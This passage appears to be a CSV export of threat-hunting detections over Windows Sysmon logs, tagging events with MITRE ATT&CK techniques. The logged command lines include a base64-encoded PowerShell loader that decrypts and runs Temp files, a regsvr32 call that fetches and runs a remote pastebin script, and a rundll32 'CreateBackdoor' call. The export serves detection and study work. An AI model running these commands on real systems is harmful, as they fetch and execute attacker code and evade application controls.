<Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
<Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
<Data Name=""ParentProcessId"">2584</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1557597534.762534,2019-05-11T21:58:54.762534+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( c:\Windows\System32\cmd.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-11T17:58:50.090659Z"">
</TimeCreated>
<EventRecordID>16116</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2032"" ThreadID=""2020"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-11 17:58:50.075</Data>
<Data Name=""ProcessGuid"">365ABB72-0D5A-5CD7-0000-001069031700</Data>
<Data Name=""ProcessId"">2544</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">c:\Windows\System32\cmd.exe</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">365ABB72-8693-5CD7-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-0D3F-5CD7-0000-00107F541600</Data>
<Data Name=""ParentProcessId"">3212</Data>
<Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -Embedding</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Process,1557597534.762534,2019-05-11T21:58:54.762534+04:00,,Threat,High,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( c:\Windows\System32\cmd.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-11T17:58:50.090659Z"">
</TimeCreated>
<EventRecordID>16116</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2032"" ThreadID=""2020"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-11 17:58:50.075</Data>
<Data Name=""ProcessGuid"">365ABB72-0D5A-5CD7-0000-001069031700</Data>
<Data Name=""ProcessId"">2544</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">c:\Windows\System32\cmd.exe</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">365ABB72-8693-5CD7-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-0D3F-5CD7-0000-00107F541600</Data>
<Data Name=""ParentProcessId"">3212</Data>
<Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -Embedding</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1557597534.762534,2019-05-11T21:58:54.762534+04:00,,Threat,High,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( c:\Windows\System32\cmd.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-11T17:58:50.090659Z"">
</TimeCreated>
<EventRecordID>16116</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2032"" ThreadID=""2020"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-11 17:58:50.075</Data>
<Data Name=""ProcessGuid"">365ABB72-0D5A-5CD7-0000-001069031700</Data>
<Data Name=""ProcessId"">2544</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">c:\Windows\System32\cmd.exe</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">365ABB72-8693-5CD7-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-0D3F-5CD7-0000-00107F541600</Data>
<Data Name=""ParentProcessId"">3212</Data>
<Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -Embedding</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1557686105.780949,2019-05-12T22:35:05.780949+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\regsvr32.exe) with commandline ( regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-12T18:35:05.155949Z"">
</TimeCreated>
<EventRecordID>16792</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1880"" ThreadID=""2020"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-12 18:35:05.140</Data>
<Data Name=""ProcessGuid"">365ABB72-6759-5CD8-0000-0010E2D50F00</Data>
<Data Name=""ProcessId"">1420</Data>
<Data Name=""Image"">C:\Windows\System32\regsvr32.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Microsoft(C) Register Server</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-63FC-5CD8-0000-0020EE3E0100</Data>
<Data Name=""LogonId"">0x13eee</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=A774A816662FF5B75669AA5BCE751BAB9D0972B8,MD5=432BE6CF7311062633459EEF6B242FB5,SHA256=890C1734ED1EF6B2422A9B21D6205CF91E014ADD8A7F41AA5A294FCF60631A7B,IMPHASH=A2DAD36BD73280726DA578EB659D0583</Data>
<Data Name=""ParentProcessGuid"">365ABB72-6693-5CD8-0000-0010AE4C0E00</Data>
<Data Name=""ParentProcessId"">3528</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1082] System Information Discovery,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( whoami) ,1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-16T16:08:40.360593Z"">
</TimeCreated>
<EventRecordID>18918</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1744"" ThreadID=""2120"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>DC1.insecurebank.local</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName"">technique_id=T1033,technique_name=System Owner/User Discovery</Data>
<Data Name=""UtcTime"">2019-05-16 16:08:40.350</Data>
<Data Name=""ProcessGuid"">DFAE8213-8B08-5CDD-0000-001011CE0A00</Data>
<Data Name=""ProcessId"">3764</Data>
<Data Name=""Image"">C:\Windows\System32\whoami.exe</Data>
<Data Name=""FileVersion"">6.3.9600.16384 (winblue_rtm.130821-1623)</Data>
<Data Name=""Description"">whoami - displays logged on user information</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">whoami</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">DFAE8213-832F-5CDD-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">2</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=E06B89D9B87A8A4E5A8B7A5307C3BA88E0A01D41,MD5=D609D59A042C04A50EB41EC5D52F7471,SHA256=16C4CEE8C7BF4070E25A32F0B95857FA5CEC51E47D246E6FBAD69887460961B2,IMPHASH=98A3BC461E82881A801A12AAA668BD47</Data>
<Data Name=""ParentProcessGuid"">DFAE8213-8B02-5CDD-0000-00109BCA0A00</Data>
<Data Name=""ParentProcessId"">1720</Data>
<Data Name=""ParentImage"">C:\Windows\System32\osk.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\osk.exe&quot; </Data>
</EventData>
</Event>",DC1.insecurebank.local,Microsoft-Windows-Sysmon/Operational
[T1117] Regsvr32,1557686105.780949,2019-05-12T22:35:05.780949+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-12T18:35:05.155949Z"">
</TimeCreated>
<EventRecordID>16792</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1880"" ThreadID=""2020"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-12 18:35:05.140</Data>
<Data Name=""ProcessGuid"">365ABB72-6759-5CD8-0000-0010E2D50F00</Data>
<Data Name=""ProcessId"">1420</Data>
<Data Name=""Image"">C:\Windows\System32\regsvr32.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Microsoft(C) Register Server</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-63FC-5CD8-0000-0020EE3E0100</Data>
<Data Name=""LogonId"">0x13eee</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=A774A816662FF5B75669AA5BCE751BAB9D0972B8,MD5=432BE6CF7311062633459EEF6B242FB5,SHA256=890C1734ED1EF6B2422A9B21D6205CF91E014ADD8A7F41AA5A294FCF60631A7B,IMPHASH=A2DAD36BD73280726DA578EB659D0583</Data>
<Data Name=""ParentProcessGuid"">365ABB72-6693-5CD8-0000-0010AE4C0E00</Data>
<Data Name=""ParentProcessId"">3528</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1557686105.780949,2019-05-12T22:35:05.780949+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-12T18:35:05.155949Z"">
</TimeCreated>
<EventRecordID>16792</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1880"" ThreadID=""2020"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-12 18:35:05.140</Data>
<Data Name=""ProcessGuid"">365ABB72-6759-5CD8-0000-0010E2D50F00</Data>
<Data Name=""ProcessId"">1420</Data>
<Data Name=""Image"">C:\Windows\System32\regsvr32.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Microsoft(C) Register Server</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-63FC-5CD8-0000-0020EE3E0100</Data>
<Data Name=""LogonId"">0x13eee</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=A774A816662FF5B75669AA5BCE751BAB9D0972B8,MD5=432BE6CF7311062633459EEF6B242FB5,SHA256=890C1734ED1EF6B2422A9B21D6205CF91E014ADD8A7F41AA5A294FCF60631A7B,IMPHASH=A2DAD36BD73280726DA578EB659D0583</Data>
<Data Name=""ParentProcessGuid"">365ABB72-6693-5CD8-0000-0010AE4C0E00</Data>
<Data Name=""ParentProcessId"">3528</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1584766825.218211,2020-03-21T09:00:25.218211+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T05:00:25.215293Z"">
</TimeCreated>
<EventRecordID>243538</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2860"" ThreadID=""3508"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 05:00:25.021</Data>
<Data Name=""ProcessGuid"">747F3D96-9F69-5E75-0000-00106F6A2000</Data>
<Data Name=""ProcessId"">2536</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
<Data Name=""ParentProcessId"">1652</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1589329703.257302,2020-05-13T04:28:23.257302+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-05-13T00:28:16.122541Z"">
</TimeCreated>
<EventRecordID>148597</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2756"" ThreadID=""3632"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-05-13 00:28:16.115</Data>
<Data Name=""ProcessGuid"">747F3D96-3F20-5EBB-0000-0010035E3600</Data>
<Data Name=""ProcessId"">8052</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.592 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">Cmd.Exe</Data>
<Data Name=""CommandLine"">C:\Windows\system32\cmd.exe</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-3821-5EBB-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
